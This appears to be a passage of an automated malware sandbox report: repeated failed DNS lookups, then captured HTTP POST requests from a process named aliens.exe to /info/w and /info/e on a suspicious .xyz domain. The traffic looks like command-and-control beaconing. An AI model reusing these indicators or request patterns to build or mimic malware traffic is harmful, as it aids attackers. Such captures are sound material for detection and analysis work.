Dec 5, 2020 08:44:05.875819921 CET | 8.8.8.8 | 192.168.2.3 | 0xfc5c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:06.408987999 CET | 8.8.8.8 | 192.168.2.3 | 0x9a51 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:06.931457043 CET | 8.8.8.8 | 192.168.2.3 | 0x5ca0 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:07.490495920 CET | 8.8.8.8 | 192.168.2.3 | 0x7e7f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:08.032026052 CET | 8.8.8.8 | 192.168.2.3 | 0x30c1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:08.579233885 CET | 8.8.8.8 | 192.168.2.3 | 0xe50b | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:09.117932081 CET | 8.8.8.8 | 192.168.2.3 | 0x44d1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:09.650924921 CET | 8.8.8.8 | 192.168.2.3 | 0xef1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:10.189573050 CET | 8.8.8.8 | 192.168.2.3 | 0xd095 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:10.736742973 CET | 8.8.8.8 | 192.168.2.3 | 0x7ed4 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:11.259766102 CET | 8.8.8.8 | 192.168.2.3 | 0xa443 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:11.814625025 CET | 8.8.8.8 | 192.168.2.3 | 0xbcd9 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:12.592415094 CET | 8.8.8.8 | 192.168.2.3 | 0xe663 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:13.201133013 CET | 8.8.8.8 | 192.168.2.3 | 0x711d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:14.384213924 CET | 8.8.8.8 | 192.168.2.3 | 0x2267 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:14.915936947 CET | 8.8.8.8 | 192.168.2.3 | 0x9788 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:15.457453966 CET | 8.8.8.8 | 192.168.2.3 | 0xdcaf | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:16.006361961 CET | 8.8.8.8 | 192.168.2.3 | 0x122f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:16.544770956 CET | 8.8.8.8 | 192.168.2.3 | 0x8a7f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:17.072150946 CET | 8.8.8.8 | 192.168.2.3 | 0xd65d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:17.611612082 CET | 8.8.8.8 | 192.168.2.3 | 0x1808 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:18.151106119 CET | 8.8.8.8 | 192.168.2.3 | 0x905f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:18.707458019 CET | 8.8.8.8 | 192.168.2.3 | 0xfbd3 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:19.244326115 CET | 8.8.8.8 | 192.168.2.3 | 0x44ad | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:19.776283979 CET | 8.8.8.8 | 192.168.2.3 | 0x6843 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:20.331681013 CET | 8.8.8.8 | 192.168.2.3 | 0xca7d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:20.869514942 CET | 8.8.8.8 | 192.168.2.3 | 0x492 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:21.384578943 CET | 8.8.8.8 | 192.168.2.3 | 0x769f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:21.917773962 CET | 8.8.8.8 | 192.168.2.3 | 0x9e60 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:22.479697943 CET | 8.8.8.8 | 192.168.2.3 | 0x8d8f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:23.010308027 CET | 8.8.8.8 | 192.168.2.3 | 0x9f9b | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:23.538587093 CET | 8.8.8.8 | 192.168.2.3 | 0xf2e2 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:24.081728935 CET | 8.8.8.8 | 192.168.2.3 | 0x434f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:24.627392054 CET | 8.8.8.8 | 192.168.2.3 | 0xf3f3 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:25.151590109 CET | 8.8.8.8 | 192.168.2.3 | 0xf392 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:25.699100018 CET | 8.8.8.8 | 192.168.2.3 | 0xca6e | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:26.253832102 CET | 8.8.8.8 | 192.168.2.3 | 0xb27d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:26.776443005 CET | 8.8.8.8 | 192.168.2.3 | 0xee8f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:27.299865007 CET | 8.8.8.8 | 192.168.2.3 | 0xb72c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:27.832472086 CET | 8.8.8.8 | 192.168.2.3 | 0x7fab | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:28.374311924 CET | 8.8.8.8 | 192.168.2.3 | 0x2273 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:28.910343885 CET | 8.8.8.8 | 192.168.2.3 | 0xd524 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:29.431976080 CET | 8.8.8.8 | 192.168.2.3 | 0xab11 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:29.969094038 CET | 8.8.8.8 | 192.168.2.3 | 0x7ec4 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:30.574170113 CET | 8.8.8.8 | 192.168.2.3 | 0x58e1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:31.119700909 CET | 8.8.8.8 | 192.168.2.3 | 0xa3a5 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:31.639300108 CET | 8.8.8.8 | 192.168.2.3 | 0x53c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:32.198580027 CET | 8.8.8.8 | 192.168.2.3 | 0xb3a6 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:32.722119093 CET | 8.8.8.8 | 192.168.2.3 | 0x1bd9 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:33.269009113 CET | 8.8.8.8 | 192.168.2.3 | 0x3fde | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:33.808217049 CET | 8.8.8.8 | 192.168.2.3 | 0xbae7 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:34.331381083 CET | 8.8.8.8 | 192.168.2.3 | 0x2cff | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:34.869741917 CET | 8.8.8.8 | 192.168.2.3 | 0x8f55 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:35.387875080 CET | 8.8.8.8 | 192.168.2.3 | 0xde4e | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:35.940874100 CET | 8.8.8.8 | 192.168.2.3 | 0xefb1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:36.487648964 CET | 8.8.8.8 | 192.168.2.3 | 0x76e6 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:37.040384054 CET | 8.8.8.8 | 192.168.2.3 | 0xbfff | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:37.574875116 CET | 8.8.8.8 | 192.168.2.3 | 0x5b38 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:38.089510918 CET | 8.8.8.8 | 192.168.2.3 | 0x19af | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:38.604686975 CET | 8.8.8.8 | 192.168.2.3 | 0xb75d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:39.136360884 CET | 8.8.8.8 | 192.168.2.3 | 0x7d09 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:39.676059008 CET | 8.8.8.8 | 192.168.2.3 | 0xb04e | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:40.230995893 CET | 8.8.8.8 | 192.168.2.3 | 0x14ba | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:40.761543989 CET | 8.8.8.8 | 192.168.2.3 | 0x2ad0 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:41.285490036 CET | 8.8.8.8 | 192.168.2.3 | 0x9080 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:41.809024096 CET | 8.8.8.8 | 192.168.2.3 | 0xf744 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:42.343743086 CET | 8.8.8.8 | 192.168.2.3 | 0xd5c9 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:42.879030943 CET | 8.8.8.8 | 192.168.2.3 | 0x8c9c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:43.413537025 CET | 8.8.8.8 | 192.168.2.3 | 0x55c1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:43.942786932 CET | 8.8.8.8 | 192.168.2.3 | 0x7bad | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:44.467500925 CET | 8.8.8.8 | 192.168.2.3 | 0x405f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:45.011172056 CET | 8.8.8.8 | 192.168.2.3 | 0x415d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:45.527698040 CET | 8.8.8.8 | 192.168.2.3 | 0x521c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:46.096565962 CET | 8.8.8.8 | 192.168.2.3 | 0x912a | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:46.624881983 CET | 8.8.8.8 | 192.168.2.3 | 0xf57c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:47.186608076 CET | 8.8.8.8 | 192.168.2.3 | 0x2942 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:47.755641937 CET | 8.8.8.8 | 192.168.2.3 | 0xf3d4 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:48.279632092 CET | 8.8.8.8 | 192.168.2.3 | 0xe143 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:48.825647116 CET | 8.8.8.8 | 192.168.2.3 | 0x59d5 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:49.344616890 CET | 8.8.8.8 | 192.168.2.3 | 0x6525 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:49.886678934 CET | 8.8.8.8 | 192.168.2.3 | 0x2253 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:50.418781042 CET | 8.8.8.8 | 192.168.2.3 | 0xfacf | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:50.942514896 CET | 8.8.8.8 | 192.168.2.3 | 0x66c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:51.481712103 CET | 8.8.8.8 | 192.168.2.3 | 0xe583 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:51.997468948 CET | 8.8.8.8 | 192.168.2.3 | 0xfc99 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:52.558666945 CET | 8.8.8.8 | 192.168.2.3 | 0x20e2 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:53.074649096 CET | 8.8.8.8 | 192.168.2.3 | 0xbb96 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:53.599467039 CET | 8.8.8.8 | 192.168.2.3 | 0xdc95 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:54.122626066 CET | 8.8.8.8 | 192.168.2.3 | 0xc8d3 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:54.661765099 CET | 8.8.8.8 | 192.168.2.3 | 0xd67e | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:55.192456961 CET | 8.8.8.8 | 192.168.2.3 | 0xfcc1 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:55.715823889 CET | 8.8.8.8 | 192.168.2.3 | 0xd800 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:56.262578964 CET | 8.8.8.8 | 192.168.2.3 | 0x89ab | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:56.783624887 CET | 8.8.8.8 | 192.168.2.3 | 0x8ec8 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:57.337253094 CET | 8.8.8.8 | 192.168.2.3 | 0x4c3 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:57.857445002 CET | 8.8.8.8 | 192.168.2.3 | 0xa191 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:58.405559063 CET | 8.8.8.8 | 192.168.2.3 | 0xea8b | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:58.950757980 CET | 8.8.8.8 | 192.168.2.3 | 0xff92 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:44:59.481197119 CET | 8.8.8.8 | 192.168.2.3 | 0x7b7c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:00.024873018 CET | 8.8.8.8 | 192.168.2.3 | 0xefe7 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:00.559737921 CET | 8.8.8.8 | 192.168.2.3 | 0xcd07 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:01.093219995 CET | 8.8.8.8 | 192.168.2.3 | 0x8b57 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:01.625252962 CET | 8.8.8.8 | 192.168.2.3 | 0x2300 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:02.171911955 CET | 8.8.8.8 | 192.168.2.3 | 0x2707 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:02.211256981 CET | 8.8.8.8 | 192.168.2.3 | 0x3c54 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:45:02.725611925 CET | 8.8.8.8 | 192.168.2.3 | 0x2276 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:03.248840094 CET | 8.8.8.8 | 192.168.2.3 | 0x1aba | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:03.764144897 CET | 8.8.8.8 | 192.168.2.3 | 0x146b | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:04.294631958 CET | 8.8.8.8 | 192.168.2.3 | 0xf9de | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:04.810632944 CET | 8.8.8.8 | 192.168.2.3 | 0xe7e9 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:05.357727051 CET | 8.8.8.8 | 192.168.2.3 | 0xee33 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:05.905102015 CET | 8.8.8.8 | 192.168.2.3 | 0xffea | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:06.435257912 CET | 8.8.8.8 | 192.168.2.3 | 0x4136 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:06.967833042 CET | 8.8.8.8 | 192.168.2.3 | 0xbad5 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:07.497612953 CET | 8.8.8.8 | 192.168.2.3 | 0xfbb4 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:08.013257027 CET | 8.8.8.8 | 192.168.2.3 | 0xac9d | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:08.530966997 CET | 8.8.8.8 | 192.168.2.3 | 0x214a | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:09.060971022 CET | 8.8.8.8 | 192.168.2.3 | 0x3d2e | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:09.593342066 CET | 8.8.8.8 | 192.168.2.3 | 0xf783 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:10.139463902 CET | 8.8.8.8 | 192.168.2.3 | 0xf14c | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:10.654100895 CET | 8.8.8.8 | 192.168.2.3 | 0xb07 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:11.169487953 CET | 8.8.8.8 | 192.168.2.3 | 0x6263 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:11.703306913 CET | 8.8.8.8 | 192.168.2.3 | 0xfa98 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:12.233783007 CET | 8.8.8.8 | 192.168.2.3 | 0xeaa4 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:45:12.765013933 CET | 8.8.8.8 | 192.168.2.3 | 0x9141 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• ef6df4af06ba6896.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49734 | 104.28.4.129 | 80 | C:\Program Files (x86)\71eza90awf48\aliens.exe
Timestamp | kBytes transferred | Direction | Data
Dec 5, 2020 08:41:53.420881033 CET | 3365 | OUT | POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:41:54.931421995 CET | 3953 | IN | HTTP/1.1 200 OK
Date: Sat, 05 Dec 2020 07:41:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d3191a04f8f38c100d0b46620e75b327c1607154113; expires=Mon, 04-Jan-21 07:41:53 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 06d372b3990000277ca4227000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FNND8WD06qx2ncRgj9CRTVDspo%2BlEch2GC4MN3p1JgozU3HRf7yd5WHlDmaYd%2Fl%2FB3tStd9tD4nPteb898VvVWUCO3HHptF10wzSo%2Bfm%2BmfgaaJkFA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5fcc2098f80a277c-PRG
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Dec 5, 2020 08:41:55.029978037 CET | 3954 | OUT | POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:41:57.531936884 CET | 3956 | IN | HTTP/1.1 200 OK
Date: Sat, 05 Dec 2020 07:41:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dfceae49fb62e0c4be3fefcb3f99721771607154115; expires=Mon, 04-Jan-21 07:41:55 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 06d372b9e20000277cda1e7000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=55fUzXMWEMnu9jdKhSwu4SNE6fASr92DHBis7Bi%2BJjmsFynFy%2BGH%2BdEqMFX2eyXsxNxfwLurNS7BiMrdr4HC46l7lt%2BeuzvmLs1ekBkdZpTa4P1QOw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5fcc20a30e30277c-PRG
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.349738104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:42:48.140707016 CET4256OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:52.078556061 CET4257INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:52 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d61870f397e3c2ce34e912cd445b0feca1607154168; expires=Mon, 04-Jan-21 07:42:48 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3738958000041200987c000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Kbh7wCU69xHKSj5slB3Ixlf%2BlI%2Bkta8%2BVyHpBzoQukpdtqhySnLLObExlSeVadJDommJwsCmm88a8DEICmfNxX6lWmKCmEiSkliGiqg%2FPFWvp2TS3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc21eefc414120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:42:57.924711943 CET4258OUTPOST /info/e HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
